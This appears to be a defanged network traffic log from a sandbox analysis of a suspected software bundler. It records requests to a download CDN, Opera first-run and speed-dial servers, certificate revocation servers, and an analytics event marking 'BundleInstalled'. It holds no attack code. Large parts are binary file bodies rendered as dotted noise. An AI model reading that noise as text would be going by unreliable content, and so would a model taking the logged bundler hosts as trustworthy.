.....)U.zDE..J.q[&...a..Ci|.^J.fQ.-..3........R...g.......Hh..m.v...K.
.w....:..8....-!.7......;K.....W..:....W8HR]VgS@...~...N.!.Dc..)..s...
<<< skipped >>>


GET /V32/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.lawfuldownload.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 15 Dec 2015 10:45:57 GMT
If-None-Match: "2d6fe112467543279b35cc8418cbd672"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn1.lawfuldownload.com
Connection: Keep-Alive


HTTP/1.1 304 Not Modified
Connection: keep-alive
Date: Sat, 19 Dec 2015 19:24:08 GMT
ETag: "2d6fe112467543279b35cc8418cbd672"
x-amz-storage-class: REDUCED_REDUNDANCY
Server: AmazonS3
Age: 30032
X-Cache: Hit from cloudfront
Via: 1.1 694067e538aff1de3d804656c0b75883.cloudfront.net (CloudFront)
X-Amz-Cf-Id: YWnqWxjfRWfDOrNMfvrJ5pmdiUvD51sSQMXIkwM19ywx2hF07EpPMA==
HTTP/1.1 304 Not Modified..Connection: keep-alive..Date: Sat, 19 Dec 2
015 19:24:08 GMT..ETag: "2d6fe112467543279b35cc8418cbd672"..x-amz-stor
age-class: REDUCED_REDUNDANCY..Server: AmazonS3..Age: 30032..X-Cache: 
Hit from cloudfront..Via: 1.1 694067e538aff1de3d804656c0b75883.cloudfr
ont.net (CloudFront)..X-Amz-Cf-Id: YWnqWxjfRWfDOrNMfvrJ5pmdiUvD51sSQMX
IkwM19ywx2hF07EpPMA==..



GET /geolocation/ HTTP/1.1
Host: autoupdate.geo.opera.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK
Date: Sat, 19 Dec 2015 19:25:09 GMT
Server: Apache/2.2.16 (Debian)
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:01 GMT
Keep-Alive: timeout=15, max=54
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/x-json; charset=utf-8
27..{"country":"UA","timestamp":1450553109}..0..HTTP/1.1 200 OK..Date:
 Sat, 19 Dec 2015 19:25:09 GMT..Server: Apache/2.2.16 (Debian)..Cache-
Control: no-cache, no-store, must-revalidate, max-age=0..Pragma: no-ca
che..Expires: Thu, 1 Jan 1970 00:00:01 GMT..Keep-Alive: timeout=15, ma
x=54..Connection: Keep-Alive..Transfer-Encoding: chunked..Content-Type
: text/x-json; charset=utf-8..27..{"country":"UA","timestamp":14505531
09}..0..



GET /pca3-g5.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: s1.symcb.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "7815f750de32498f5b74e8e2036c6131:1449630201"
Last-Modified: Wed, 09 Dec 2015 02:48:37 GMT
Date: Sat, 19 Dec 2015 19:25:12 GMT
Content-Length: 533
Connection: keep-alive
Content-Type: application/pkix-crl
0...0..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U
....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For aut
horized use only1E0C..U...<VeriSign Class 3 Public Primary Certific
ation Authority - G5..151207000000Z..160331235959Z0...*.H.............
@.{....?..A....R9............j..#b..h.q\.........r...{.............'..
.t7...<..H......'F..Y..e.F..a..3..]..}.}1[...........)U.zDE..J.q[&.
..a..Ci|.^J.fQ.-..3........R...g.......Hh..m.v...K..w....:..8....-!.7.
.....;K.....W..:....W8HR]VgS@...~...N.!.Dc..)..s.HTTP/1.1 200 OK..Serv
er: Apache..ETag: "7815f750de32498f5b74e8e2036c6131:1449630201"..Last-
Modified: Wed, 09 Dec 2015 02:48:37 GMT..Date: Sat, 19 Dec 2015 19:25:
12 GMT..Content-Length: 533..Connection: keep-alive..Content-Type: app
lication/pkix-crl..0...0..0...*.H........0..1.0...U....US1.0...U....Ve
riSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriS
ign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 Publ
ic Primary Certification Authority - G5..151207000000Z..160331235959Z0
...*.H.............@.{....?..A....R9............j..#b..h.q\.........r.
..{.............'...t7...<..H......'F..Y..e.F..a..3..]..}.}1[......
.....)U.zDE..J.q[&...a..Ci|.^J.fQ.-..3........R...g.......Hh..m.v...K.
.w....:..8....-!.7......;K.....W..:....W8HR]VgS@...~...N.!.Dc..)..s...
<<< skipped >>>


GET /evcs.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: evcs-crl.ws.symantec.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "96a3c436e726a5a17f089060b803ad0e:1450517590"
Last-Modified: Sat, 19 Dec 2015 09:00:58 GMT
Date: Sat, 19 Dec 2015 19:24:58 GMT
Content-Length: 2524
Connection: keep-alive
Content-Type: application/pkix-crl
0...0......0...*.H........0..1.0...U....US1.0...U....Symantec Corporat
ion1.0...U....Symantec Trust Network1=0;..U...4Symantec Class 3 Extend
ed Validation Code Signing CA..151219090058Z..151226090058Z0...0!.....
.>....{. ......131029083537Z0!...z..Q..{O..k1?....121226193726Z0!..
..A.O.;...........130918162142Z0!...a .....X..G.&.(..120920195501Z0!..
.....|..K..p.HA...131114172131Z0!...a<.N..\[k..||q...121113220113Z0
!...n.g.}=rt|.....P..130416151422Z0!.....o...uq...../...140516212339Z0
!...e..-'Y...9!......130320133514Z0!...N6..B....>.r.....13061016555
5Z0!...[..MMK...T-.Y....131021161346Z0!.....V@.N....g......14050209563
6Z0!....=...,.....0b.*..140205010422Z0!....wE..^..LF....L..14091511031
3Z0!...CQ~...9......4F..130207225040Z0!...#..hmHZi.>.6..E..13071617
3410Z0!..!q...|@d8....Tt...140312180031Z0!..'x....Tg,...M.Sp..13111819
5156Z0!..*".....i...<R..>..130812193938Z0!...@.2.k..Cx.%..p...15
1027013342Z0!.....kG&.....4...N..140218140428Z0!..0......SY..\.&Cp..14
0325141402Z0!..3&....Vjyxg..:....130308131012Z0!..4..`...... .......13
1107155859Z0!..4..!.5..<.._q.\e..121126224218Z0!..4...,6.]w.^T..R..
.141020180109Z0!..5.......q...o.AO..130419133226Z0!..9#.......n.......
.121025210412Z0!..:._c...k.\..e.....120723222250Z0!..;......Z<3.A04
.:..140513212824Z0!..<Mw.f..O..6,&.....130729223110Z0!..<.S..U..
z...U.....130425024845Z0!..=..1..0/..r. ..s..130424195525Z0!..>..nd
...|.%.......130621101437Z0!..@<.0.VZR..x...~...140408141157Z0!..@.
.O..:J.!........140314051541Z0!..D...-./Uc'1..=....130207213638Z0!
<<< skipped >>>


GET /sha2-ha-server-g3.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl3.digicert.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=172800
Content-Type: application/x-pkcs7-crl
Date: Sat, 19 Dec 2015 19:25:15 GMT
Etag: "3391006474"
Expires: Mon, 21 Dec 2015 19:25:15 GMT
Last-Modified: Sat, 19 Dec 2015 17:15:05 GMT
Server: ECS (ams/D037)
X-Cache: HIT
Content-Length: 85479
0..M.0..L....0...*.H........0p1.0...U....US1.0...U....DigiCert Inc1.0.
..U....VVV.digicert.com1/0-..U...&DigiCert SHA2 High Assurance Server 
CA..151219170319Z..151226170000Z0..K.0!.....IF.......a.T{..14092911571
1Z0!.....b..\.}...;d.%..140929211002Z0!....k.N.Qb....$}....14093015182
9Z0!...:..*x.....BDn....140930171558Z0!.......Dy.....v.._..14093017290
1Z0!...(.7&_.....^m5A...141001085603Z0!.......w\.....Z.....14100108560
3Z0!.....<.[.5~&].p.Q...141001085603Z0!....<};`o.......;...14100
1151932Z0!..........M<.g......141001151941Z0!....g]}....pcav`....14
1001152006Z0!...2.b......_u.%.0..141001152016Z0!....V...Yj.()....#..14
1001152240Z0!...&.n....T...J".7..141001152247Z0!....3x.]\...........14
1001152257Z0!......L..~...o.X.v..141001152423Z0!...y.....gU...K.....14
1001152534Z0!....k{1....r.\...5..141001152545Z0!.....V8..'_.n.......14
1001152648Z0!....rf...M.....Z....141001152657Z0!....;.Lp./?.5..Pb...14
1001153156Z0!.....0\gP.b.{....A..141001153204Z0!......;.>..N..aN...
.141001153212Z0!...P..t.yj..x.%_t...141001153220Z0!.....v....w..B.....
.141001153246Z0!..../.O;............141001153254Z0!...n.M..D...Nye.K .
.141001153449Z0!......\k.......V....141001153459Z0!........E.?.o...?..
.141002145022Z0!....3]..}b:Y..'^8U..141002155328Z0!....Ab}'F.,.|3A..i.
.141002162648Z0!.....G.-26....D..1..141002162703Z0!.....&..u...MQ...7.
.141002162703Z0!...._.?.mQ..z*W3.S..141002210102Z0!....Od.H.....H2.4..
.141002215502Z0!...x...Y...$.}..0J..141002232203Z0!.....1S.(_.5..[52P.
.141003123516Z0!...K.2.*Sj9@"}p..h..141003143202Z0!....G..........
<<< skipped >>>


GET /speeddials/partner/booking_com_us?ab_tests=DNA-45706-2-group:DNA-45706-2 HTTP/1.1
Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found
Server: Apache/2.2.16 (Debian)
Location: hXXp://redir.opera.com/previews/images/booking_com_us/sd_264x168.png
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/plain
Content-Length: 26
Date: Sat, 19 Dec 2015 19:25:16 GMT
X-Varnish: 2871789007
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS
..............................


GET /speeddials/partner/macys_com?ab_tests=DNA-45706-2-group:DNA-45706-2 HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found
Server: Apache/2.2.16 (Debian)
Location: hXXp://redir.opera.com/previews/images/macys_com/sd_264x168.png
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/plain
Content-Length: 26
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789050
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS
..............................


GET /speeddials/partner/wikipedia_org_us?ab_tests=DNA-45706-2-group:DNA-45706-2 HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found
Server: Apache/2.2.16 (Debian)
Location: hXXp://redir.opera.com/previews/images/wikipedia_org_us/sd_264x168.png
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/plain
Content-Length: 26
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789080
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS
..............................


GET /previews/images/facebook_other/sd_264x168.png HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 17 Dec 2015 12:28:02 GMT
ETag: "1498cb-9cc-527172761b880"
Content-Type: image/png
Content-Length: 2508
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789103 2871761633
Age: 81
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
X-Varnish-Cache-Hits: 200
.PNG........IHDR............. C......PLTE;Y.p...........m..[t....z..q.
.i..Oj.~..........................`x...............................r..
Eb.Rm................Ie.............>\...................Lg.......U
o.......Jf.............Zs.......o..............>[..........z.......
....ay.......^v....y..}..]v.......<Z.......D`......._w.k..@].v.....
...Gc.......................................................Hd.Kf.l..H
d.g~..........e|.x..Ni.......n........Da.s........s.....Xr....}..\u.Kg
.Rl....h..f}..........Qk.Xq.C`.p..j.................Pk..........Mh....
..........................._x.Ys.............bz.Tn.u.....Wq.Vp.Fb....B
_..........=Z.A^.Ni....t..............i.....c{.......Sm...............
..........?\.......\t.{........d|..........r....IDATx^..5..1..Q..D..a.
...a..&p.%....:......................L-{.}z~..-Up...F]*o|.Y..........y
9.\Nb.....Z!." ..1..!....bU>.N.....b.]..#2!>.._.?......'C...5..l
.q.x..!...,..].!....WTU.._1..).! ......pF.C../)y.......(...X..Z.f....h
7 ;.`)...aA.@....?....s....Y...f.....9..o.=.............p...k...4.~q. 
........o...u........t........G.<.9*....36..VX]..8.bj....1..d.....*
..nb..A.$A. `.|<%...H.j.*...*;0.Z..u.A%bZ.D.c..b..&...^.C..$..j<
_..........R...A..y......e5!.D..F.f.y". ..D.s.y"f....\..........*pE.j.
.F"xYh.."..t.. .u....Z.K...&8W.2`.......Z..X)p2.D......9d......W......
E.."..5.j".2..qs.O...^D...Z.z.....l.Z.<./.."..!p.. S.....Y==...^D.M
.l>......6....C".x.<....D...<..&Xr...e.....`6..;~FCnP.v..<
*.0..;.UW...#wg..........cC...17.2n.......P)..@..7TM..s.S.MN....=0
<<< skipped >>>

GET /previews/images/expedia_com/sd_264x168.png HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 17 Dec 2015 12:28:02 GMT
ETag: "149895-1a1d-527172761b880"
Content-Type: image/png
Content-Length: 6685
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789127 2871767739
Age: 65
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
X-Varnish-Cache-Hits: 13
.PNG........IHDR.....................IDATx....X.i..GR..<..]Z.uDC5."
.<.r...LS..(....}. .g....Z..J....cWn... G*......I....g....=..3.TO..
..........1....@.. ...........b..1....@.. ...........@.. ...........b.
.1....@.. ..................b..1....@.. ...........b..1...........b..1
....@.. .........(....7.d..........C...%*a_........z........y....X..k;
..j.4..Vjj'7...b....N.....}.g...a.22..*,d.....s...=...a..~...v2..[.w..
..m.'.9.f..q...............l?p.../.VA..!.{};k.N...A...i6..hY.....k...;
....j....O...7..)x...|.b...3..M.....B[.......4r.f..{..zP..0~...Y...K..
.....N ...]..l.. vV....Ew...r.. ..............)g,]....[.TAQ.....e.2w..
..Oe...G.._..2.t_.z..p.U.|*'i..9..A.vRp.pm.....!. .o..e.............$.
;.....$Ugi...5..u4....h.F}{Edt2.@7......}'...........K.V.Rm..Q......Z.
.....3....&F^~A.1.....o6..f.s#..)...Z.......JF....?e.... .E...B.l.....
j.I.dH....9.5.i1...>~.V....q.....GSIS11(.[.xH..f#.?7.D.....j3..'..W
.....1.3.U..Ro6..n6H....(...t.pTeBU....,8?...:.......S2.~.bd..f.YQ9 T.
..j6.o.H.<.7...Dn.5..6.6....Z.n..}.'.&2..z.n....F.sQ..(.h..s..[M...
(oI\.\.j5`2.ey...D.......*..o7..4.*L6.9..X$..T.IBm..`,.7..9..e...'....
...d.............$.D..x..i.B..........q.(`.6sG?Z...h........./....[1..
.......l....P..l.'..nP.A.c..6.._..g7...{`.d...Y.uX...0z.YD...9...gF.P.
u..[.....(..Q...~...&FV.c.....j...CC{...)..........c$.6..MV..^..{.Y.n.
.y.N.l..`....d(..=r*."<"..M...v.. 6*0w...:..`...U..&F^. ..S....tm..
.x.......\.LT..F.$..i...3.q.....F...o..x...F..8..{[...WPf.......'..C.:
.R....#^y.../=yx.J}..6.....WX.C.9P8...{..?.U.>9.......W..5..U.A
<<< skipped >>>

GET /previews/images/priceline_com/sd_264x168.png HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 17 Dec 2015 12:28:02 GMT
ETag: "149d9c-1987-527172761b880"
Content-Type: image/png
Content-Length: 6535
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789152 2871726956
Age: 164
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
X-Varnish-Cache-Hits: 65
.PNG........IHDR...............p....NIDATx...1..... o..k....8.@.d.>
........ .@.. .A.......@.. .A......... .@.. ....... .@.. .A.......@.. 
.A......... .@.. .A..... .@.. .A.......... .A..........w&.YUg.........
8Z..2O...O.....j[.Y.i.O.ig.v..........T.(.....I.F...!...$da.aIB6.$....
.y....{.so>......y./....{.{..?.y..9.. V,@X.b..D4K.H..}.=.e.C.F9...n
.`.........(>.X.~..pBt......?/R.zg.Q.7;.....x.....!r..=.....J?.....
..P..kT......ju........k/..=m.F.............Z-,.S...7W.P#.g..,H.w...=.
...J......:...9.:.ugK...ky.G...._].....f.@.......m..........l:...b..$.
.../c...&....(S... .z.... ^....5{=..K&..... .9*2wm...P|.7....Lb.Y.....
..w)S...tb.....1X.....Tu.9b.[Z....C]k(. ........)...].JyC....D. ..2@..
...'....3P...$u.....X..G...u~r.Fe*.'.:Q...A....k.....9zT...k.yv.a....!
 .{...........U.x....R...POdlP..<...C.iJU......"...r.....>..E...
[U}k..C..}....5.....8!....].E%@.qC..v(F.yg.....d...../..$...-........&
lt;D}..}....>.l..uF....%......t.....`<...a........k.S...H..t..,u
............>.@............i.b.=$...6..[.=..x ...qL.k.O...n|n..&.W.
.}.........B:...I0J..uO/Q.-*S.66...fUR...U6...[.7^]...f....4.....}.RP.
c%.'^A......Oe...G.%:.$..$^..7tL80........2.PR....T|.N...V..f...^..; .
X.c.......X....u...jU,...@i......]mh..u.hj..l1 .nN.@.E.N...W.I|N=....@
q.._?#.|...:.|.. .....$.hD.:.q...I....b..(.oU;......?...P,...o...2@.:.
`.NU.../..@.....w........;....:.......].."=..g.kd.n........E...zV.....
.e.B.....iS...*.a...g\....G....h..F#d.....:.@.m..........K ..Q..]..t..
.=.....E.....Z...Z..z/Y.....S$..u..qHU....x....N. h.xmij.....DWu..
<<< skipped >>>

GET /previews/images/bestbuy_com/sd_264x168.png HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 17 Dec 2015 12:28:02 GMT
ETag: "6c53f-16f4-527172761b880"
Content-Type: image/png
Content-Length: 5876
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789178 2871757629
Age: 95
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
X-Varnish-Cache-Hits: 24
.PNG........IHDR.....................IDATx......U........{OH..)..$.:..
@ @@..,."*.....F,.*.6T....S...>A....^...d..........sn....~...9....Y
k.._k...B......A....C.D.A.1.A....C.D.A.1.A....C.D.A.1.A...A....C.D.A.1
.A....C.D.A.1.A....C.D.A.1.A....C...C.D.A.1.A....C.D....K.k...L?..!...
.l.H..O..4...ic....m......o.%.E/;z.~........O?.....?......m........9..
.-..,..@nG.hs..<r.=a.....ng.~....v.../b.*X...XY&.#b."..m..g....l.L.
1.Z.p;............=...[g_o...go|.....1..1..........w..^."..)v..v...<
;...^_.9ngv...$.#b4...e..d.......fE ..3.......{..7..n....eg.n.....Z..d
w;r;"F7V..... g.Z.....".........3..v;.&....x......G.i..dW.S.`,..`ECn..
Ot..'^..vF.h....n....^.v.GV..`.....4...S&%.r;...O.kw.........Ng.......
.......>....6`E.n..wu..s.(......-......7........V..?.p`....-.z..,."
b.0.........n...................h..,.*b.*f.!.........D.....~..vn....9b
..C..P.hI.89....m?..X.#X......D.....m.., .:...K...0sz...;@.....;..k...
.....E..A.......1ZI=>. .(F...a-................i..eY.t..... ....lG.
.z.K..=........A..."O~.#;6v....@.0.B.q.6.I..B.'...fcF..y..cl..H$r.s...
..../..0...........ec..lKj.>...U^.h(r....g./......"........v...n*&/
.....".x.[H..y;j...V...U......../..>.^w...v..G#........kul.1"FY...l
....=zeT~.q.i.(L.4.>.1..j...tF.]..6=..<...D{......G.g...G.S!.k..
.sl.f.....v.04...p.Q..q..*..[.R....Jy..M..!FA.bY{%......3D.......o..V.
%..,....&..G.W..[..-.......-..g....R....u>.\x.s".=}....C....v..5V..
..Z...S&.W?...~....r.(....#.....#..1....(...Y3*|....}..(.6lh. [....:..
<..c...d;~...HrD....."F.....x.%..<y=..s.Q.-[O;....Bl.j......
<<< skipped >>>


GET /VVV.opera.com/firstrun/?utm_source=winnersolution&utm_campaign=1png&utm_medium=pb&http_referrer=&query=/opera/stable?utm_source=winnersolution&utm_medium=pb&utm_campaign=1png HTTP/1.1
Host: redir.opera.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Debian)
Content-Type: application/octet-stream
Content-Length: 0
Date: Sat, 19 Dec 2015 19:25:18 GMT
X-Varnish: 815585542
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS
HTTP/1.1 404 Not Found..Server: Apache/2.2.16 (Debian)..Content-Type: 
application/octet-stream..Content-Length: 0..Date: Sat, 19 Dec 2015 19
:25:18 GMT..X-Varnish: 815585542..Age: 0..Via: 1.1 varnish..Connection
: keep-alive..X-Varnish-Cache: MISS..



POST /collect HTTP/1.1
Content-Length: 106
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2552.0 Safari/537.36
Host: VVV.google-analytics.com
Connection: Keep-Alive

v=1&tid=UA-58019139-1&cid=ae4dd573-2629-469e-894e-5a12de748395&t=event&ec=BundleInstalled&ea=Started&el=UA
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Date: Sat, 19 Dec 2015 19:23:52 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
X-Content-Type-Options: nosniff
Content-Type: image/gif
Server: Golfe2
Content-Length: 35
GIF89a.............,...........D..;HTTP/1.1 200 OK..Access-Control-All
ow-Origin: *..Date: Sat, 19 Dec 2015 19:23:52 GMT..Pragma: no-cache..E
xpires: Fri, 01 Jan 1990 00:00:00 GMT..Cache-Control: no-cache, no-sto
re, must-revalidate..Last-Modified: Sun, 17 May 1998 03:00:00 GMT..X-C
ontent-Type-Options: nosniff..Content-Type: image/gif..Server: Golfe2.
.Content-Length: 35..GIF89a.............,...........D..;..



GET /root.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.globalsign.net
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Date: Sat, 19 Dec 2015 19:25:13 GMT
Content-Type: application/pkix-crl
Content-Length: 649
Connection: keep-alive
Set-Cookie: __cfduid=da3d6eee9a785a74fa435e17c8db338e01450553113; expires=Sun, 18-Dec-16 19:25:13 GMT; path=/; domain=.globalsign.net; HttpOnly
Last-Modified: Wed, 07 Oct 2015 00:00:00 GMT
ETag: "56146080-289"
CF-Cache-Status: HIT
Expires: Wed, 23 Dec 2015 19:25:13 GMT
Cache-Control: public, max-age=345600
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 25757dff91b52c6c-AMS
0...0..m...0...*.H........0W1.0...U....BE1.0...U....GlobalSign nv-sa1.
0...U....Root CA1.0...U....GlobalSign Root CA..151007000000Z..16011500
0000Z0..0*.........D.....141125000000Z0.0...U.......0*........)E.....1
41125000000Z0.0...U.......0*........ ...h..141125000000Z0.0...U.......
0*........,^.....141125000000Z0.0...U......../0-0...U......20...U.#..0
...`{f.E....P/}..4....K0...*.H.............<.............&..,t...[.
.:.A..*.H..w........=.E.{(-ekb..?.....y....k..e..59B>Z....O`.].`!..
....7....I.^..T..e.[..K.....V.4B.U.B.!........R....... ..07b...j..c.".
.%[..o..i..I..A^......O$..R.2.....v"....*...9...ueET....xz..R.Gm....-.
..r.[..s......;,..`.W...8HTTP/1.1 200 OK..Date: Sat, 19 Dec 2015 19:25
:13 GMT..Content-Type: application/pkix-crl..Content-Length: 649..Conn
ection: keep-alive..Set-Cookie: __cfduid=da3d6eee9a785a74fa435e17c8db3
38e01450553113; expires=Sun, 18-Dec-16 19:25:13 GMT; path=/; domain=.g
lobalsign.net; HttpOnly..Last-Modified: Wed, 07 Oct 2015 00:00:00 GMT.
.ETag: "56146080-289"..CF-Cache-Status: HIT..Expires: Wed, 23 Dec 2015
 19:25:13 GMT..Cache-Control: public, max-age=345600..Accept-Ranges: b
ytes..Server: cloudflare-nginx..CF-RAY: 25757dff91b52c6c-AMS..0...0..m
...0...*.H........0W1.0...U....BE1.0...U....GlobalSign nv-sa1.0...U...
.Root CA1.0...U....GlobalSign Root CA..151007000000Z..160115000000Z0..
0*.........D.....141125000000Z0.0...U.......0*........)E.....141125000
000Z0.0...U.......0*........ ...h..141125000000Z0.0...U.......0*......
..,^.....141125000000Z0.0...U......../0-0...U......20...U.#..0...`
<<< skipped >>>


GET /speeddials/partner/aliexpress_com_us?ab_tests=DNA-45706-2-group:DNA-45706-2 HTTP/1.1
Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found
Server: Apache/2.2.16 (Debian)
Location: hXXp://redir.opera.com/previews/images/aliexpress_com/sd_264x168.png
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/plain
Content-Length: 26
Date: Sat, 19 Dec 2015 19:25:16 GMT
X-Varnish: 2871789010
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS
..............................


GET /speeddials/partner/youtube?ab_tests=DNA-45706-2-group:DNA-45706-2 HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found
Server: Apache/2.2.16 (Debian)
Location: hXXp://redir.opera.com/previews/images/youtube_other/sd_264x168.png
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/plain
Content-Length: 26
Date: Sat, 19 Dec 2015 19:25:17 GMT
X-Varnish: 2871789059
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS
..............................


GET /speeddials/partner/twitter_us?ab_tests=DNA-45706-2-group:DNA-45706-2 HTTP/1.1


Host: redir.opera.com
Connection: keep-alive
CH: dw=264, dh=168, dpr=1.000000
X-Purpose: preview
